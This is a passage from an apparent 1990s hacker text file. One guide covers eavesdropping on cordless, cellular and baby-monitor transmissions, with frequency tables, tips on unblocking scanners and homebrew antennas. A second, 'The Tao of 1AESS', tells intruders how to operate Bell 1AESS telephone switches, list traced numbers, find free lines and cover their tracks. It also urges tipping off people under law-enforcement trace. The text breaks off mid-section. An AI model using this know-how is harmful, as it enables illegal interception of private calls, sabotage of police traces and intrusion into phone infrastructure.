prevents the base from accepting tones from other, unauthorized, handsets.
|
|||
|
It does not hinder monitoring the calls, but the DTMF tones will not be
|
|||
|
recognizable. In the 46-49MHz phones, there are ten frequency pairs
|
|||
|
available. Many older phones only utilize one pair. Newer, more expensive,
|
|||
|
phones can utilize all ten pairs. Some automatically search for an open
|
|||
|
channel, while others can be manually manipulated to find a channel with less
|
|||
|
noise. Likewise, the new 900MHz phones will scan to find a clear channel.
|
|||
|
|
|||
|
|
|||
|
CELLULAR
|
|||
|
--------
|
|||
|
Legal Stuff:
|
|||
|
Intercepting cellular mobile telephone (CMT) traffic is illegal. The
|
|||
|
Electronic Communications Privacy Act of 1986 made it so. Scanners that
|
|||
|
receive the CMT portion of the 800MHz range may no longer be manufactured,
|
|||
|
sold, or imported into the U.S. Many scanners were designed to scan this
|
|||
|
area, though. When the Cellular Telephone Industry Association began
|
|||
|
complaining about this fact, most scanner manufacturers/resalers voluntarily
|
|||
|
"blocked" the cellular freqs from their scanners. This pacified the CTIA for
|
|||
|
a while, but the "blocks" were easily hackable. Typically, restoring a
|
|||
|
"blocked" scanner involved removing a single diode, a ten minute job for even
|
|||
|
the most devout technophobe. This fact led to the passage of the Telephone
|
|||
|
Disclosure and Dispute Resolution Act (TDDRA), which denies F.C.C.
|
|||
|
certification of scanners that receive cellular freqs, or those which may be
|
|||
|
easily modified to do so. New scanners will be "blocked" at the CPU, and
|
|||
|
hacking them is unlikely. Frequency converters offered another means of
|
|||
|
monitoring cellular and other 800MHz traffic. Essentially, a converter
|
|||
|
receives an 800MHz signal, and converts it to a 400MHz signal that the scanner
|
|||
|
is capable of receiving. Converters are useful for scanners that have no
|
|||
|
800MHz reception capabilities, as well as those that have portions of the
|
|||
|
800MHz band blocked. Unfortunately, converters were also outlawed by the
|
|||
|
TDDRA. They are still legal in kit-form, however. Another option would be
|
|||
|
to build one from scratch, which isn't an especially difficult project.
|
|||
|
|
|||
|
Technical Stuff:
|
|||
|
The word "cellular" defines the cellular phone system. A service area is
|
|||
|
broken up into many small cells. As a user travels through an area, his call
|
|||
|
will be handed off from one cell to the next. This handoff is transparent to
|
|||
|
the user, but a monitor will lose the conversation. Cellular phones use low
|
|||
|
power (a maximum of five watts) so that a cell phone will not attempt to seize
|
|||
|
more than one site at a time. When a call is initiated by a cell phone, the
|
|||
|
nearest site will respond, and assign an available frequency to the phone.
|
|||
|
When the user moves comes into range of the next site, the process repeats
|
|||
|
itself, and the new site will assign a new frequency. Therefore, it can be
|
|||
|
difficult to track a particular conversation as it moves from site to site
|
|||
|
with a single scanner. Every area served by cellular phones will have two
|
|||
|
service providers. One will be the local RBOC, while the other will be a
|
|||
|
cellular-only provider. The two systems are designated as "A" and "B"
|
|||
|
systems, or "Wireline" and "Non-Wireline". There is no difference between
|
|||
|
the two for monitoring purposes, but since "A" and "B" carriers use different
|
|||
|
frequencies, it should be possible to identify local cell-towers as being "A"
|
|||
|
or "B" sites.
|
|||
|
|
|||
|
|
|||
|
PHONE PATCH
|
|||
|
-----------
|
|||
|
Legal Stuff:
|
|||
|
The Communications Act of 1934 applies here as well, but there are no other
|
|||
|
prohibitions on monitoring business-band phone patches.
|
|||
|
|
|||
|
Technical Stuff:
|
|||
|
Many business radio systems have the ability to tie into the phone
|
|||
|
system. Most of these systems will be found in 800MHz trunked
|
|||
|
radio systems. In a conventional radio system, one frequency will
|
|||
|
equal one channel. In a trunked system, however, frequencies and
|
|||
|
channels are independent of each other. The trunking computer will
|
|||
|
assign a different frequency to a radio each time it transmits,
|
|||
|
and it will send a signal to other radios on the same channel,
|
|||
|
telling them the current frequency in use. Phone patches are easy
|
|||
|
to monitor, though. Since the radio on a phone patch is
|
|||
|
transmitting constantly, the frequency used will remain the same
|
|||
|
for the duration of the conversation. Many people mistakenly
|
|||
|
believe these calls to be cellular, but they are not. Most phone
|
|||
|
patches found in 800MHz trunked systems will be full-duplex, just
|
|||
|
like cellular and home phones. Some systems, especially in UHF
|
|||
|
(around 450MHz) and 800MHz conventional radio systems will only be
|
|||
|
half-duplex, though. In those systems, only one person call talk
|
|||
|
at a time, just like normal two-way radios. Radio systems are
|
|||
|
typically designed to offer service to an entire metropolitan area,
|
|||
|
so range is quite good. The mobile radio will transmit its signal
|
|||
|
to a strategically located "repeater", which then re-broadcasts the
|
|||
|
signal with much more power. So long as a scanner is within
|
|||
|
reception range of the repeater output, monitoring will be possible
|
|||
|
regardless of the location of the party transmitting.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
EQUIPMENT
|
|||
|
----------
|
|||
|
Legal Stuff:
|
|||
|
Some states prohibit mobile use of scanners. Also, it is illegal
|
|||
|
to use a scanner in the commission of a crime.
|
|||
|
|
|||
|
Technical Stuff:
|
|||
|
There is a scanner for every appetite. What sort of monitoring
|
|||
|
one wants to do will dictate which scanner one buys. For someone
|
|||
|
interested only in cordless phones, a ten-channel scanner with no
|
|||
|
800MHz coverage will be quite adequate, and much cheaper than a
|
|||
|
more capable scanner. For someone interested in cellular, a full-
|
|||
|
coverage 800MHz scanner with a much greater frequency storage
|
|||
|
capacity will be necessary. Base, mobile or handheld? Depends
|
|||
|
entirely on how it will be used. Modern scanners are programmable,
|
|||
|
while older units require crystals. For someone wanting to monitor
|
|||
|
only a few channels (such as cordless phones, or the local police),
|
|||
|
a crystal-controlled scanner would be adequate, and much cheaper.
|
|||
|
But for more serious and varied scanning, programmable units are
|
|||
|
a necessity. Models are available that store between 10 and 1000
|
|||
|
channels. Uniden/Bearcat and Realistic are the two most commonly
|
|||
|
available brands in the U.S. (although Realistic isn't actually a
|
|||
|
brand, just a label...Radio Shack scanners are all manufactured by
|
|||
|
Uniden or GRE, depending on the model). Because of the TDDRA, many
|
|||
|
of the best scanners from the past several years are no longer
|
|||
|
available, but watch for Hamfests (great electronic flea-
|
|||
|
markets...inquire at your local ham radio/electronics store),
|
|||
|
garage sales, etc. There is nothing in the TDDRA or other current
|
|||
|
legislation that prevents private parties from owning or selling
|
|||
|
pre-TDDRA equipment. Aside from the scanner itself, the next-most
|
|||
|
important piece of equipment is the antenna. Handheld scanners
|
|||
|
will generally utilize an "all-band" rubber-duck antenna (a
|
|||
|
flexible, rubberized antenna, between 8-14" in length), while base
|
|||
|
units will have a telescoping metal whip antenna. These antennas
|
|||
|
are adequate for receiving strong, local signals, but more
|
|||
|
discriminating monitors will demand more. For base units, an all
|
|||
|
band discone type antenna, mounted outside as high as practical,
|
|||
|
will offer good, omnidirectional performance. For those who only
|
|||
|
want to monitor a particular band, it would be best to use an
|
|||
|
antenna cut specifically for that band. Likewise, for those
|
|||
|
monitoring signals coming from one general direction, a directional
|
|||
|
antenna will offer better performance than an omnidirectional unit.
|
|||
|
For mobile use, using an antenna mounted on the vehicle will
|
|||
|
greatly improve reception.
|
|||
|
|
|||
|
|
|||
|
MISCELLANEOUS COMMUNICATIONS
|
|||
|
----------------------------
|
|||
|
Voice-pagers can offer interesting monitoring. While the data-
|
|||
|
transmissions that send the signal to the proper pager are
|
|||
|
proprietary digital signals (and as such, illegal to monitor or
|
|||
|
decipher), the actual "voice messages" are transmitted "in the
|
|||
|
clear".
|
|||
|
Packet-radio is used by ham radio operators. They have a vast
|
|||
|
network of computer bbs's that operate independently of the phone
|
|||
|
system. Modulated data is sent over the airwaves with a ham
|
|||
|
transceiver, where it is received and de-modulated with a Terminal
|
|||
|
Node Controller (TNC). Expect the use of wireless data
|
|||
|
transmissions to increase over the next few years, and not just
|
|||
|
among ham operators.
|
|||
|
While not having anything to do with telephones, the "baby
|
|||
|
monitors" people use are transmitters just like cordless phones.
|
|||
|
They are also low-power devices, so range is limited. Most people
|
|||
|
who use these devices would be shocked to learn that they are
|
|||
|
"bugging" their own home.
|
|||
|
|
|||
|
PRESENT AND FUTURE CHALLENGES
|
|||
|
-----------------------------
|
|||
|
Spread spectrum, digital transmissions, encryption...these are all
|
|||
|
factors that are affecting monitoring today. While most cellular
|
|||
|
systems are presently analog systems, there are operational digital
|
|||
|
systems in some areas. Scanners that are currently available won't
|
|||
|
be able to decipher the digital communications, and it is unlikely
|
|||
|
that digital-capable scanners will be produced. That means it will
|
|||
|
be up to the hackers to provide the technology to intercept these
|
|||
|
communications. Spread spectrum is quite hackable, as it was never
|
|||
|
intended as an encryption system, per se, yet the phone
|
|||
|
manufacturers are certainly marketing it as such. And one oft
|
|||
|
overlooked advantage of the Clipper chip is the fact that the
|
|||
|
backdoor can be exploited by hackers as well as the government.
|
|||
|
In the meanwhile, there are plenty of intercepts to be had, and
|
|||
|
there will continue to be.
|
|||
|
|
|||
|
|
|||
|
=================================================================
|
|||
|
|
|||
|
For More Information:
|
|||
|
=================================================================
|
|||
|
|
|||
|
Scanner Modification Handbook (Vols. I & II), by Bill Cheek
|
|||
|
The scanner modification handbooks offer a plethora of information
|
|||
|
on hacking scanners. Hacks include: increased channel capacity
|
|||
|
(example: RS PRO-2006 from 400 channels to 6,400!), adding signal-
|
|||
|
strength meters, cellular-freq. restoration, scanning-speed
|
|||
|
increases, and much more.
|
|||
|
|
|||
|
World Scanner Report, by Bill Cheek
|
|||
|
A monthly newsletter on the latest scanner hacks.
|
|||
|
|
|||
|
Available from:
|
|||
|
COMMtronics Engineering
|
|||
|
Box 262478
|
|||
|
San Diego, CA 82196-2478
|
|||
|
BBS: (619) 578-9247 (5:30PM to 1:30PM P.S.T. ONLY!)
|
|||
|
|
|||
|
COMMtronics Engineering also offers a scanner-computer interface
|
|||
|
for RS PRO-43/2004/2005/2006 model scanners.
|
|||
|
===================================================================
|
|||
|
CRB Research Books
|
|||
|
Box 56
|
|||
|
Commack, MY 11725
|
|||
|
|
|||
|
CRB has books on scanner modifications, frequency guides, and other
|
|||
|
interesting subjects.
|
|||
|
=================================================================
|
|||
|
POPULAR COMMUNICATIONS
|
|||
|
|
|||
|
CQ Publications
|
|||
|
76 N. Broadway
|
|||
|
Hicksville, NY 11801
|
|||
|
(516) 681-2926
|
|||
|
|
|||
|
Pop Comm is a monthly magazine on all sorts of radio monitoring,
|
|||
|
including scanning, shortwave, and broadcast.
|
|||
|
==================================================================
|
|||
|
MONITORING TIMES
|
|||
|
|
|||
|
Grove Enterprises, Inc.
|
|||
|
P.O. Box 98,
|
|||
|
300 S. Highway 64 West
|
|||
|
Brasstown, North Carolina 28902-0098
|
|||
|
|
|||
|
M.T. is a monthly magazine covering all varieties of radio
|
|||
|
communications.
|
|||
|
|
|||
|
==================================================================
|
|||
|
NUTS & VOLTS
|
|||
|
Nuts & Volts is a monthly magazine that covers a wide variety of
|
|||
|
electronic-related subjects.
|
|||
|
|
|||
|
T&L Publications, Inc.
|
|||
|
430 Princeland Court
|
|||
|
Corona, CA 91719
|
|||
|
(909) 371-8497
|
|||
|
(909) 371-3052 fax
|
|||
|
CI$ 74262,3664
|
|||
|
1-800-783-4624 SUBSCRIPTION ORDERS ONLY
|
|||
|
===================================================================
|
|||
|
USENET:
|
|||
|
alt.radio.scanner
|
|||
|
rec.radio.scanner
|
|||
|
===================================================================
|
|||
|
|
|||
|
Charts & Tables:
|
|||
|
|
|||
|
1. Cordless Telephone Frequencies (VHF)
|
|||
|
2. Cordless Telephone Frequencies (900MHz)
|
|||
|
3. Cellular Telephone Frequencies
|
|||
|
4. Business Band Frequencies (VHF, UHF, 800MHz)
|
|||
|
5. IMTS Frequencies
|
|||
|
6. PAGER Frequencies
|
|||
|
7. PACKET Frequencies
|
|||
|
8. ROOM MONITOR Frequencies
|
|||
|
9. homebrew cordless dipole antenna
|
|||
|
10. homebrew 1/4 wave groundplane antenna
|
|||
|
|
|||
|
|
|||
|
=================================================================
|
|||
|
TABLE 1 - CORDLESS TELEPHONE FREQS. (CONVENTIONAL)
|
|||
|
|
|||
|
CH BASE HANDSET
|
|||
|
-- ---- -------
|
|||
|
1 46.100 49.670
|
|||
|
2 46.630 49.845
|
|||
|
3 46.670 49.860
|
|||
|
4 46.710 49.770
|
|||
|
5 46.730 49.875
|
|||
|
6 46.770 49.830
|
|||
|
7 46.830 49.890
|
|||
|
8 46.870 49.930
|
|||
|
9 46.930 49.990
|
|||
|
10 46.970 46.970
|
|||
|
=================================================================
|
|||
|
TABLE 2 - 900MHz CORDLESS FREQS.
|
|||
|
|
|||
|
Cordless phones have been allocated the frequencies
|
|||
|
between 902-228MHz, with channel spacing between
|
|||
|
30-100KHz.
|
|||
|
Following are some examples of the frequencies used by phones
|
|||
|
currently on the market.
|
|||
|
|
|||
|
----------------------------------------------------------------
|
|||
|
Panasonic KX-T9000 (60 Channels)
|
|||
|
base 902.100 - 903.870 Base frequencies (30Khz spacing)
|
|||
|
handset 926.100 - 927.870 Handset frequencies
|
|||
|
CH BASE HANDSET CH BASE HANDSET CH BASE HANDSET
|
|||
|
-- ------- ------- -- ------- ------- -- ------- -------
|
|||
|
01 902.100 926.100 11 902.400 926.400 21 902.700 926.700
|
|||
|
02 902.130 926.130 12 902.430 926.430 22 902.730 926.730
|
|||
|
03 902.160 926.160 13 902.460 926.460 23 902.760 926.760
|
|||
|
04 902.190 926.190 14 902.490 926.490 24 902.790 926.790
|
|||
|
05 902.220 926.220 15 902.520 926.520 25 902.820 926.820
|
|||
|
06 902.250 926.250 16 902.550 926.550 26 902.850 926.850
|
|||
|
07 902.280 926.280 17 902.580 926.580 27 902.880 926.880
|
|||
|
08 902.310 926.310 18 902.610 926.610 28 902.910 926.910
|
|||
|
09 902.340 926.340 19 902.640 926.640 29 902.940 926.940
|
|||
|
10 902.370 926.370 20 902.670 926.670 30 902.970 926.970
|
|||
|
|
|||
|
31 903.000 927.000 41 903.300 927.300 51 903.600 927.600
|
|||
|
32 903.030 927.030 42 903.330 927.330 52 903.630 927.630
|
|||
|
33 903.060 927.060 43 903.360 927.360 53 903.660 927.660
|
|||
|
34 903.090 927.090 44 903.390 927.390 54 903.690 927.690
|
|||
|
35 903.120 927.120 45 903.420 927.420 55 903.720 927.720
|
|||
|
36 903.150 927.150 46 903.450 927.450 56 903.750 927.750
|
|||
|
37 903.180 927.180 47 903.480 927.480 57 903.780 927.780
|
|||
|
38 903.210 927.210 48 903.510 927.510 58 903.810 927.810
|
|||
|
39 903.240 927.240 49 903.540 927.540 59 903.840 927.840
|
|||
|
40 903.270 927.270 50 903.570 927.570 60 903.870 927.870
|
|||
|
|
|||
|
------------------------------------------------------------
|
|||
|
|
|||
|
V-TECH TROPEZ DX900 (20 CHANNELS)
|
|||
|
905.6 - 907.5 TRANSPONDER (BASE) FREQUENCIES (100 KHZ SPACING)
|
|||
|
925.5 - 927.4 HANDSET FREQUENCIES
|
|||
|
|
|||
|
CH BASE HANDSET CH BASE HANDSET CH BASE HANDSET
|
|||
|
-- ------- ------- -- ------- ------- -- ------- -------
|
|||
|
01 905.600 925.500 08 906.300 926.200 15 907.000 926.900
|
|||
|
02 905.700 925.600 09 906.400 926.300 16 907.100 927.000
|
|||
|
03 905.800 925.700 10 906.500 926.400 17 907.200 927.100
|
|||
|
04 905.900 925.800 11 906.600 926.500 18 907.300 927.200
|
|||
|
05 906.000 925.900 12 906.700 926.600 19 907.400 927.300
|
|||
|
06 906.100 926.000 13 906.800 926.700 20 907.500 927.400
|
|||
|
07 906.200 926.100 14 906.900 926.800
|
|||
|
|
|||
|
------------------------------------------------------------
|
|||
|
OTHER 900 MHZ CORDLESS PHONES
|
|||
|
AT&T #9120 - - - - - 902.0 - 905.0 & 925.0 - 928.0 MHZ
|
|||
|
OTRON CORP. #CP-1000 902.1 - 903.9 & 926.1 - 927.9 MHZ
|
|||
|
SAMSUNG #SP-R912- - - 903.0 & 927.0 MHZ
|
|||
|
|
|||
|
------------------------------------------------------------
|
|||
|
==================================================================
|
|||
|
TABLE 3 - CELLULAR TELEPHONE FREQUENCIES
|
|||
|
wireline ("b" side carrier)
|
|||
|
824.1000-834.9000
|
|||
|
869.0100-879.9900
|
|||
|
|
|||
|
non-wireline ("a" side carrier)
|
|||
|
835.0200-849.0000
|
|||
|
880.0200-894.0000
|
|||
|
|
|||
|
|
|||
|
==================================================================
|
|||
|
TABLE 4 - BUSINESS BAND RADIO FREQS.
|
|||
|
|
|||
|
151.5050-151.9550MHz
|
|||
|
154.4900-154.5400
|
|||
|
460.6500-462.1750
|
|||
|
462.7500-465.0000
|
|||
|
471.8125-471.3375
|
|||
|
474.8125-475.3375
|
|||
|
896.0125-900.9875
|
|||
|
935.0125-939.9875
|
|||
|
806.0125-810.9875
|
|||
|
811.0125-815.9875
|
|||
|
816.0125-820.9875
|
|||
|
851.0125-855.9875
|
|||
|
856.0125-860.9875
|
|||
|
861.0125-865.9875
|
|||
|
=================================================================
|
|||
|
TABLE 5 - MOBILE TELEPHONE FREQS. (see note1 below)
|
|||
|
SIMPLEX OUTPUT INPUT OUTPUT INPUT
|
|||
|
-------- -------- -------- -------- --------
|
|||
|
035.2600 152.0300 158.4900 454.3750 459.3750
|
|||
|
035.3000 152.0600 158.5200 454.4000 459.4000
|
|||
|
035.3400 152.0900 158.5500 454.4250 459.4250
|
|||
|
035.3800 152.1200 158.5800 454.4500 459.4500
|
|||
|
035.5000 152.1500 158.6100 454.4750 459.4750
|
|||
|
035.5400 152.1800 158.6400 454.5000 459.5000
|
|||
|
035.6200 152.2100 158.6700 454.5250 459.5250
|
|||
|
035.6600* 454.0250 459.0250 454.5500 459.5500
|
|||
|
043.2200* 454.0500 459.0500 454.5750 459.5750
|
|||
|
043.2600 454.0750 459.0750 454.6000 459.6000
|
|||
|
043.3400 454.1000 459.1000 454.6250 459.6250
|
|||
|
043.3800 454.1250 459.1250 454.6500 459.6500
|
|||
|
043.4200 454.1500 459.1500
|
|||
|
043.3000 454.1750 459.1750
|
|||
|
043.5000 454.2000 459.2000
|
|||
|
043.5400 454.2250 459.2250
|
|||
|
043.5800* 454.2500 459.2500
|
|||
|
043.6400* 454.2750 459.2750
|
|||
|
152.2400* 454.3000 459.3000
|
|||
|
152.8400* 454.3250 459.3250
|
|||
|
158.1000* 454.3500 459.3500
|
|||
|
158.7000*
|
|||
|
|
|||
|
*-also allocated for pager usage
|
|||
|
|
|||
|
(note1: These freqs are, for the most part, dead. The FCC has
|
|||
|
reallocated most of these for other services.)
|
|||
|
|
|||
|
=================================================================
|
|||
|
TABLE 6 - PAGER FREQUENCIES
|
|||
|
035.2200 035.5800 152.4800 154.6250 158.4600
|
|||
|
157.7400 465.0000 462.8000 462.7750 462.9250
|
|||
|
462.7500 462.8750 462.8250 462.9000 462.8500
|
|||
|
928.0000 929.0000 930.0000 931.0000
|
|||
|
=================================================================
|
|||
|
TABLE 7 - PACKET FREQUENCIES
|
|||
|
050.6200
|
|||
|
223.5200-223.6400
|
|||
|
223.7100-223.8500
|
|||
|
2303.500-2303.800
|
|||
|
2303.900
|
|||
|
2399.000-2399.500
|
|||
|
=================================================================
|
|||
|
TABLE 8 - BABY MONITOR FREQUENCIES
|
|||
|
49.300
|
|||
|
49.830
|
|||
|
49.845
|
|||
|
49.890
|
|||
|
=================================================================
|
|||
|
TABLE 9 - AIR PHONE FREQUENCIES
|
|||
|
OUTPUT INPUT
|
|||
|
454.6750 459.6750
|
|||
|
454.9750 459.9750
|
|||
|
849.0000 851.0000
|
|||
|
894.0000 896.0000
|
|||
|
==================================================================
|
|||
|
|
|||
|
CHART 10 - IMPROVED ANTENNA FOR CORDLESS MONITORING
|
|||
|
|
|||
|
The best way to improve the range for monitoring cordless
|
|||
|
telephones is to use an antenna specifically cut for the
|
|||
|
frequencies used in cordless phones. The following is a very
|
|||
|
effective, yet easy to build, "homebrew" antenna.
|
|||
|
|
|||
|
CORDLESS DIPOLE
|
|||
|
---------------
|
|||
|
materials needed:
|
|||
|
wire - virtually any type will suffice
|
|||
|
matching transformer (RS part number 15-1296)
|
|||
|
f connector (RS part number 278-225)
|
|||
|
??? connector (this will connect the antenna to the scanner, so it
|
|||
|
will be dependant upon what type of antenna jack the scanner
|
|||
|
utilizes. Most use a BNC-type connector. Some older models
|
|||
|
will use a Motorola-type connector.)
|
|||
|
coax cable - while many types of coax can be used, a low-loss cable
|
|||
|
would be best, especially if a long cable run is required.
|
|||
|
RG-6 satellite coax (RS part number 278-1316) is a good choice.
|
|||
|
|
|||
|
|
|||
|
wire transformer wire
|
|||
|
-------------------------< >-------------------------
|
|||
|
+ f connector
|
|||
|
|
|
|||
|
| coax
|
|||
|
|
|
|||
|
|
|
|||
|
* connector
|
|||
|
[ ] scanner
|
|||
|
|
|||
|
=================================================================
|
|||
|
|
|||
|
CHART 11 - 1/4 WAVE GROUND PLANE ANTENNA
|
|||
|
|
|||
|
Here is a simple-to-build antenna that will improve reception for
|
|||
|
a particular frequency area.
|
|||
|
|
|||
|
materials needed:
|
|||
|
wire - a rigid wire is needed here. Clothes hangers work well.
|
|||
|
panel mount SO-239 connector (RS part number 278-201)
|
|||
|
male PL-259 connector (RS part number 278-205)
|
|||
|
coax cable
|
|||
|
connector (to scanner)
|
|||
|
|
|||
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
[ ]
|
|||
|
/ \
|
|||
|
/ \
|
|||
|
/ \
|
|||
|
|
|||
|
|
|||
|
The length of the five rods will be dependant upon the frequency
|
|||
|
you intend to monitor. Use the following formula:
|
|||
|
|
|||
|
WL=3X10^8/F
|
|||
|
|
|||
|
WL = wavelegnth (in meters)
|
|||
|
F = frequency (in MHz)
|
|||
|
|
|||
|
|
|||
|
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
-=-
|
|||
|
|
|||
|
-= The Tao of 1AESS =-
|
|||
|
-=-=-=-=-=-=-=-=
|
|||
|
-= DeadKat&Disorder =-
|
|||
|
|
|||
|
-=-
|
|||
|
|
|||
|
-= Special thanks to Gatsby and Mark Tabas =-
|
|||
|
|
|||
|
|
|||
|
Introduction
|
|||
|
-=-=-=-=-=-=
|
|||
|
The Bell System's first trial of electronic switching took place in Morris,
|
|||
|
Illinois, in 1960. The Morris trial culminated a 6-year development and
|
|||
|
proved the viability of the stored-program control concept. The first
|
|||
|
application of electronic local switching in the Bell System occurred in May
|
|||
|
1965 with the cutover of the first 1ESS switch in Succasunna, New Jersey.
|
|||
|
|
|||
|
The 1ESS switching system was designed for use in areas where large numbers
|
|||
|
of lines and lines with heavy traffic (primarily business customers) are
|
|||
|
served. The system has generally been used in areas serving between 10,000
|
|||
|
and 65,000 lines and has been the primary replacement system for urban
|
|||
|
step-by-step and panel systems. The ease and flexibility of adding new
|
|||
|
services made 1ESS switching equipment a natural replacement vehicle in
|
|||
|
city applications where the demand for new, sophisticated business and
|
|||
|
residence services is high.
|
|||
|
|
|||
|
In 1976, the first electronic toll switching system to operate a digital
|
|||
|
time-division switching network under stored-program control, the 4ESS
|
|||
|
system, was placed in service. It used a new control, the 1A processor,
|
|||
|
for the first time to gain a call carrying capacity in excess of 550,000
|
|||
|
busy-hour calls. The 1A processor was also designed for local switching
|
|||
|
application. It doubled the call-carrying capacity of the 1ESS switching
|
|||
|
system and was introduced in 1976 in the first 1AESS switch. The network
|
|||
|
capacity of 1ESS switching equipment was also doubled to allow the 1AESS
|
|||
|
switch to serve 130,000 lines.
|
|||
|
|
|||
|
In addition to local telephone service, the 1AESS switches offer a variety
|
|||
|
of special services. Custom Local Area Switching Services (CLASS) are
|
|||
|
available as well Custom Calling Services. Business customers may select
|
|||
|
offerings such as centrex, ESS-ACS, Enhanced Private Switched Communications
|
|||
|
Service, or electronic tandem switching.
|
|||
|
|
|||
|
Although more modern switches like 5ESS and DMS 200 have been developed, it
|
|||
|
is estimated that some 50 percent of all switches are still 1AESS.
|
|||
|
|
|||
|
Commands
|
|||
|
-=-=-=-=
|
|||
|
The 1AESS uses a command line interface for all commands. The commands are
|
|||
|
divided into three fields: action, identification, and data. The fields
|
|||
|
are always separted by a colon. Every command is terminated by either a
|
|||
|
period for verification commands or a 'ballbat' (!) for change commands.
|
|||
|
The control-d is used to execute the command instead of a return. The
|
|||
|
underscore is used as a backspace. Commands are always typed in 'all caps'.
|
|||
|
|
|||
|
The action field is the first field of the command and is ended by a colon.
|
|||
|
The identification field is ended by the second colon. The identification
|
|||
|
field has one or two subfields which are separated by a semicolon. Semicolons
|
|||
|
are not used elsewhere in the command. The data field consists of keyword
|
|||
|
units and is the remaining portion of the command.
|
|||
|
|
|||
|
Basic Machine Commands
|
|||
|
-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
These commands provide useful information from the system. The WHO-RV-
|
|||
|
command will tell you what CO it is and what version of the OS is installed.
|
|||
|
If your output is scrolling off the screen press space to end scrolling.
|
|||
|
The V-STOP- command will clear the buffer.
|
|||
|
|
|||
|
WHO-RV-. System information.
|
|||
|
SPACE Stops output from scrolling.
|
|||
|
V-STOP-. Free buffer of remaining LENS/INFO.
|
|||
|
|
|||
|
Channel Commands
|
|||
|
-=-=-=-=-=-=-=-=
|
|||
|
Channel commands are used to redirect input and output. If a switch won't
|
|||
|
respond to a command use the OP:CHAN command to check on current channel.
|
|||
|
If your channel is not responding, use the MON:CHAN command to switch output
|
|||
|
and control to your terminal (the remote). You can check the status of the
|
|||
|
RC with the RCCENSUS command.
|
|||
|
|
|||
|
OP:CHAN:MON! Shows all channels which are being monitored.
|
|||
|
MON:CHAN SC1;CHAN LOC! Redirect output to remote screen.
|
|||
|
STOP: MON;CHAN SC1;CHAN LOC! Redirect output to local screen.
|
|||
|
(This command needs to be done after you
|
|||
|
are finished to help cover your tracks)
|
|||
|
OP:RCCENSUS! To see recent change status.
|
|||
|
|
|||
|
|
|||
|
Tracing Commands
|
|||
|
-=-=-=-=-=-=-=-=
|
|||
|
CI-LIST- will give you a list of all numbers which are being traced
|
|||
|
externally. It will not show you lines which are being traced
|
|||
|
internally, ie: numbers inside one of the prefixes controlled
|
|||
|
by the switch you are on.
|
|||
|
|
|||
|
CI-LIST-. Traced line list.
|
|||
|
|
|||
|
|
|||
|
Check Features on Line
|
|||
|
-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
The VF command is used to check the current settings on a line.
|
|||
|
The DN XXXXXXX specifies the phone number of the line you wish to check.
|
|||
|
Replace XXXXXXX with the seven digit phone number of the line you are
|
|||
|
checking.
|
|||
|
|
|||
|
VF:DNSVY:FEATRS,DN XXXXXXX,1,PIC! Check features of a line.
|
|||
|
VF:DNSVY:DN XXXXXXX,1,LASFTRS! Display last Features
|
|||
|
|
|||
|
Call Features CWT- Call Waiting
|
|||
|
CFB- Call Forward Busy - Busy=VM
|
|||
|
CFV- Call Forwarding Variable
|
|||
|
CFD- Call Forward Don't answer
|
|||
|
TWC- Three Way Calling
|
|||
|
TTC- Touch Tone
|
|||
|
RCY- Ring Cycle
|
|||
|
SC1- Speed Calling 1
|
|||
|
SC2- Speed Calling 2
|
|||
|
UNA- No Long Distance
|
|||
|
PXX- Block all LD service (guess)
|
|||
|
MWI- Message Waiting Indicator
|
|||
|
CHD- centrex(unremarkable)
|
|||
|
CPU- centrex(unremarkable)
|
|||
|
CLI- Calling Line Identification (CID)
|
|||
|
ACB- Automatic Call Back Feature (?)
|
|||
|
BLN- Special Toll Billing
|
|||
|
FRE- Free Calling
|
|||
|
|
|||
|
The standard output of a command appears below. The 'DN 348 2141' specifies
|
|||
|
the number you are checking. The calling features will be listed on the
|
|||
|
second line by their three letter acronyms. This line has call waiting
|
|||
|
(CWT), a trace (TRC), and touch tone dialing (TTC).
|
|||
|
|
|||
|
Example of 1A output:
|
|||
|
|
|||
|
M 53 TR75 2 DN 348 2141 00000003
|
|||
|
CWT TRC TTC
|
|||
|
|
|||
|
|
|||
|
Searching For Free Lines
|
|||
|
-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
The VFY command can be used to check if a line is in use. The output will
|
|||
|
list the LEN (Line Equipment Number) for the line and its call features in
|
|||
|
octal. If the LEN is all zeros, then that number has not been assigned.
|
|||
|
Replace XXXXXXX with the number you wish to check. You must prefix the
|
|||
|
phone number with 30. You can also check for unused LEN's using the VFY
|
|||
|
command. Use the space bar to stop scrolling and the V-STOP command to
|
|||
|
cancel when looking up free LEN's.
|
|||
|
|
|||
|
VFY-DN-30XXXXXXX. Search for free lines.
|
|||
|
VFY-LEN-4100000000. List all free LENs.
|
|||
|
VFY-TNN-XXXXXXXX. To get information on trunk.
|
|||
|
|
|||
|
The output for the VFY-DN command will appear like the one below. Notice
|
|||
|
that this number has been assigned a LEN so it is in use.
|
|||
|
|
|||
|
M 06 TR01 796 9146
|
|||
|
0 0 0 0
|
|||
|
LEN 01 025 000
|
|||
|
001 000 000 000 000 000 4
|
|||
|
000 000 000 000 000 000 000 000
|
|||
|
0 0 0 0
|
|||
|
0 0 0 0 0
|
|||
|
|
|||
|
|
|||
|
Searching for a Particular Feature on a Line (like trace)
|
|||
|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
All line information is stored in the switch for its coverage area. The
|
|||
|
switch is like a huge database in this sense. You can do global searches
|
|||
|
on the switch for any feature. One especially interesting feature to search
|
|||
|
for are traced numbers. Traced numbers listed this way are INTERNALLY
|
|||
|
traced as opposed to globally traced numbers shown with the CI-LIST- command.
|
|||
|
Global and internal trace lists are always very different. And remember,
|
|||
|
be a good samaritan and call the person being traced and let them know! ;-)
|
|||
|
|
|||
|
VF:DNSVY:FEATRS,EXMATCH TRACE! Pull all numbers IN switch area with
|
|||
|
trace on it (takes a sec).
|
|||
|
|
|||
|
You can exmatch for any LASS feature by replacing the keyword TRACE with any
|
|||
|
call feature like call forwarding (CFB) and speed calling (SC1).
|
|||
|
|
|||
|
|
|||
|
To See What Numbers Are on a Speed Calling List
|
